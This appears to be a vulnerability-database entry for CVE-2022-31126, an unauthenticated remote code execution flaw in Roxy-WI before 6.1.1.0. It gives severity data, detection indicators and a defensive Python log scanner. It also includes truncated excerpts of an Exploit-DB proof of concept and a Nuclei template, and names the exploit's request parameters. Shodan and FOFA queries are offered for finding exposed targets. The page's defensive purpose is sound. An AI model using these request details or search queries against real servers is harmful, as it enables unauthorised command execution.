CVE-2022-31126
Published: 2022-07-06
Priority: P1 · 91 · critical · 9.8 (CVSS 3.1)
CVSS 3.1 vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploited in the wild (VulnCheck KEV)
EPSS: 40.98% (98.5th percentile)
Roxy-wi is an open source web interface for managing Haproxy, Nginx, Apache and Keepalived servers. A vulnerability in Roxy-wi allows a remote, unauthenticated attacker to achieve code execution by sending a specially crafted HTTP request to the /app/options.py file. This affects Roxy-wi versions before 6.1.1.0. Users are advised to upgrade. There are no known workarounds for this issue.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hap-wi | roxy-wi | < 6.1.1.0 | 6.1.1.0 |
| roxy-wi | roxy-wi | < 6.1.1.0 | 6.1.1.0 |
Detection & IOCs (extracted from sources)
YARA regex: uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)
- The exploit payload uses an empty 'token' field alongside 'show_versions=1' and 'alert_consumer=1', indicating no authentication is required. Alert on POST to /app/options.py with token= (empty).
- Successful exploitation returns output matching 'uid=...gid=...' in the HTTP response body. Monitor HTTP 200 responses from /app/options.py containing this pattern.
- Use Shodan/FOFA queries to identify exposed Roxy-WI instances as potential targets: Shodan html:"Roxy-WI", FOFA body="roxy-wi".
- The vulnerable code path involves the ssh_command function in /app/funct.py which does not sanitize user-supplied input before executing system commands.
- The PoC uses 'serv=127.0.0.1' as the server parameter; in real attacks this value may vary. Detection rules should not rely solely on this specific IP value.
- This vulnerability affects Roxy-WI versions strictly before 6.1.1.0. Versions 6.1.1.0 and later are not affected.
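The two request/response indicators above can be combined into a single log check. The following is an added example written for this page; it is not code from the Roxy-WI project or from any of the sources cited here. It assumes one JSON record per log line with `method`, `path`, `body`, `status` and `response` fields (a constructed format; map it onto whatever your reverse proxy or WAF actually emits), and deliberately ignores the `serv` value, since the note above says that value varies between attacks.

```python
"""Detection logic for the CVE-2022-31126 indicators (added example).

Assumed log format: one JSON object per line with the keys
method, path, body, status, response. Field names are an assumption.
"""
import json
import re
from urllib.parse import parse_qs

# Endpoint named in the advisory and the detection notes.
VULN_PATH = "/app/options.py"

# Same pattern as the page's YARA-style regex. The character class contains
# "(" and ")" on purpose so it matches id(1)-style output such as
# "uid=0(root) gid=0(root)".
ID_OUTPUT_RE = re.compile(r"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)")


def request_matches(path: str, body: str) -> bool:
    """True when the POST body has the unauthenticated exploit shape:
    an empty 'token' together with show_versions=1 and alert_consumer=1."""
    if path.split("?", 1)[0] != VULN_PATH:
        return False
    # keep_blank_values=True is required, otherwise "token=" disappears.
    params = parse_qs(body, keep_blank_values=True)
    token = params.get("token", [None])[0]
    # 'serv' is intentionally not inspected: attackers change it freely.
    return (
        token == ""
        and params.get("show_versions", [""])[0] == "1"
        and params.get("alert_consumer", [""])[0] == "1"
    )


def response_matches(status: int, response_excerpt: str) -> bool:
    """True when a 200 response carries uid=/gid= command output."""
    return status == 200 and ID_OUTPUT_RE.search(response_excerpt) is not None


def scan_log(lines):
    """Return [(record_number, [reasons])] for every record that trips an indicator."""
    findings = []
    non_empty = (line for line in lines if line.strip())
    for n, line in enumerate(non_empty, 1):
        rec = json.loads(line)
        path = rec.get("path", "")
        reasons = []
        if rec.get("method") == "POST" and request_matches(path, rec.get("body", "")):
            reasons.append("exploit-shaped POST to /app/options.py with empty token")
        if path.split("?", 1)[0] == VULN_PATH and response_matches(
            rec.get("status", 0), rec.get("response", "")
        ):
            reasons.append("id-style output in 200 response")
        if reasons:
            findings.append((n, reasons))
    return findings


# Constructed sample records (not real traffic). Record 1 shows both
# indicators; record 2 is an authenticated, benign-looking request to the
# same endpoint; record 3 is unrelated.
SAMPLE_LOG = """
{"method": "POST", "path": "/app/options.py", "body": "alert_consumer=1&serv=10.0.0.5&token=&show_versions=1", "status": 200, "response": "uid=0(root) gid=0(root) groups=0(root)"}
{"method": "POST", "path": "/app/options.py", "body": "token=abc123&serv=10.0.0.5&show_versions=1", "status": 200, "response": "<html>ok</html>"}
{"method": "GET", "path": "/app/login.py", "body": "", "status": 200, "response": "<html>login</html>"}
"""

if __name__ == "__main__":
    for number, why in scan_log(SAMPLE_LOG.splitlines()):
        print(f"record {number}: {'; '.join(why)}")
```

Either indicator on its own is worth an alert: the request-shape check fires before any command runs, while the response check catches variants of the payload that still echo command output but use different parameters.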
CVSS provenance
- NVD (CVSS v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- NVD (CVSS v2.0): 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
- VulnCheck: 10.0 CRITICAL
No detection rules found.
Exploit-DB
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
exploitdb · 2023-04-03 · CVSS 10.0 · [CRITICAL]
---
# ADVISORY INFORMATION
# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
# Date found: 21 July 2022
# Application: Roxy WI <= v6.1.0.0
# Author: Nuri Çilengir
# Vendor Homepage: https://roxy-wi.org
# Software Link: https://github.com/hap-wi/roxy-wi.git
# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-31126
# PoC
POST /app/options.py HTTP/1.1
Host: 192.168.56.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-
Nuclei
Roxy-WI - Remote Code Execution
nuclei · CVSS 9.8 · [CRITICAL]
Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the ssh_command function without processing the inputs received from the user in the /app/funct.py file.
Template:
id: CVE-2022-31126
info:
  name: Roxy-WI - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    Roxy-WI before 6.1.1.0 is susceptible to remote code execution. System commands can be run remotely via the ssh_command function without processing the inputs received from the user in the /app/funct.py file.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Users are advised to upgrade to latest version.
  reference:
    - https://pent
No writeups or analysis indexed.